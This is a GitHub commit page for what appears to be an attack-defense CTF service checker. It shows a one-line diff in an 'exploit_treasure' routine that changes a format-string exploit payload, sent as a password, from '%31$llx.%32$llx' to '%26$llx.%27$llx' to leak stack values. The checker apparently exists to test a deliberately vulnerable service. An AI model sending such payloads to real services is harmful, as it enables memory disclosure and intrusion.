Skip to content

Commit

Permalink
update checker
Browse files Browse the repository at this point in the history
  • Loading branch information
ignisco committed Jul 15, 2024
1 parent 7675901 commit cc6ce74
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion checker/src/checker.py
Original file line number Diff line number Diff line change
Expand Up @@ -387,7 +387,7 @@ async def exploit_treasure(task: ExploitCheckerTaskMessage, searcher: FlagSearch
await conn.reader.readuntil(b": ")

# Send the format string exploit as the password
conn.writer.write(b'%31$llx.%32$llx\n') # NOTE: Could differ on the vulnbox (because of x86?)
conn.writer.write(b'%26$llx.%27$llx\n') # NOTE: vulnbox: %26$llx.%27$llx (because of x86?)
await conn.writer.drain()

# Read the buffer to get the incorrect password message
Expand Down

0 comments on commit cc6ce74

Please sign in to comment.